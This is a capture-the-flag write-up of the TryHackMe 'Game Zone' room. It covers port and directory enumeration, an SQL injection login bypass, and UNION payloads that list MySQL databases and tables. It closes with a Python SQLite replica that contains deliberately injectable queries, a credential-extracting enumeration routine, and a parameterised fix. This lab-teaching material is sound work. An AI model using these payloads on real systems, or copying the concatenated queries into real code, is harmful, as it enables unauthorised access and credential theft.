https://tryhackme.com/jr/gamezone

Pwned Date - 16th July 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Game Zone
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 10.10.119.102 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd            (Status: 403) [Size: 297]
/.htaccess            (Status: 403) [Size: 297]
/.hta                 (Status: 403) [Size: 292]
/images               (Status: 301) [Size: 315] [--> http://10.10.119.102/images/]
/index.php            (Status: 200) [Size: 4502]                                  
/server-status        (Status: 403) [Size: 301]


Exploitation

We can log in by submitting the SQL injection payload below as the username and leaving the password blank (the # comments out the rest of the WHERE clause, so the password check is never evaluated):

' or 1 = 1 #


After logging in, we are redirected to /portal.php


To enumerate the backend manually we can query the INFORMATION_SCHEMA database in MySQL.

This is MySQL's own catalog of metadata: the names of every database, table and column the server knows about, plus related bookkeeping. The SCHEMATA table specifically lists the database names. The following payload, sent in the searchitem parameter of the portal's search form, extracts them:

searchitem=test' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3-- -

The original search query returns three columns, so the UNION SELECT must supply three values as well. The catalog query is nested in parentheses so it can stand in for a single column, and because it returns more than one row we wrap it in group_concat() so every value is collapsed into one comma-separated string. The result shows up on the page in place of the second column:


The *_schema, sys and mysql databases belong to MySQL itself and can be ignored; the db database is the interesting one.

Now that we have a database to target, we can query INFORMATION_SCHEMA.TABLES for the names of the tables within it:

searchitem=test' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3-- -

This returns the names of the two tables inside the db database, again displayed in place of the second column.

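To make the two injection points above concrete, here is a stand-alone replica of them built on SQLite. This is an added example, not code from the Game Zone room or from TryHackMe: the table names, column names and the original queries are assumptions chosen to mirror the behaviour seen on the page, and the sample rows are constructed. Two differences from MySQL matter and are flagged in the code: SQLite's catalog is sqlite_master and pragma_table_info() rather than INFORMATION_SCHEMA, and SQLite only understands the -- comment, so the login payload is written as ' or 1 = 1 -- instead of ' or 1 = 1 #. The parameterised login is included alongside the vulnerable one to show why the same payload stops working once input is bound instead of concatenated.

```python
"""Replica of the Game Zone login bypass and UNION-based catalog enumeration.

Added example (not the room's code). Schema, queries and data are assumed.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a login table and a three-column search table."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwd TEXT)")
    cur.execute("INSERT INTO users (username, pwd) VALUES ('agent47', 'secret-hash')")
    cur.execute("CREATE TABLE post (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    cur.executemany(
        "INSERT INTO post (name, description) VALUES (?, ?)",
        [("Hitman", "stealth"), ("Fallout 4", "rpg")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """User input concatenated straight into the query (assumed to match the room).

    With username = "' or 1 = 1 -- " the WHERE clause becomes
        username = '' or 1 = 1 -- ' AND pwd = ''
    so the password comparison is commented out and the first user row comes back.
    (MySQL also accepts # as a comment, which is what the page's payload uses.)
    """
    sql = f"SELECT username FROM users WHERE username = '{username}' AND pwd = '{password}'"
    return conn.execute(sql).fetchone()


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised version: the payload is compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    return conn.execute(sql, (username, password)).fetchone()


def vulnerable_search(conn: sqlite3.Connection, searchitem: str):
    """Three-column search, so a UNION payload must supply exactly three values."""
    sql = f"SELECT id, name, description FROM post WHERE name LIKE '%{searchitem}%'"
    return conn.execute(sql).fetchall()


def inject(conn: sqlite3.Connection, subquery: str) -> str:
    """The page's technique: nest the catalog query in parentheses so it acts as
    one column, wrap it in group_concat() so multi-row results fit in one field,
    and read the result out of the second column of the injected row."""
    payload = f"test' UNION SELECT 1,({subquery}),3-- -"
    rows = vulnerable_search(conn, payload)
    # '%test' matches nothing in the sample data, so the only row is the UNION row.
    return rows[0][1]


def enumerate_schema(conn: sqlite3.Connection) -> dict:
    """Walk the catalog the way the write-up does: tables -> columns -> data.

    sqlite_master and pragma_table_info() stand in for MySQL's
    INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS here.
    """
    tables = inject(conn, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    columns = inject(conn, "SELECT group_concat(name) FROM pragma_table_info('users')")
    creds = inject(conn, "SELECT group_concat(username || ':' || pwd) FROM users")
    return {"tables": tables, "users_columns": columns, "users_rows": creds}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable login:", vulnerable_login(db, "' or 1 = 1 -- ", ""))
    print("parameterised login:", safe_login(db, "' or 1 = 1 -- ", ""))
    for key, value in enumerate_schema(db).items():
        print(f"{key}: {value}")
```

The same three-step walk (SCHEMATA, then TABLES filtered by TABLE_SCHEMA, then COLUMNS filtered by TABLE_NAME, then the data itself) is what the manual payloads above perform against MySQL; only the catalog names change.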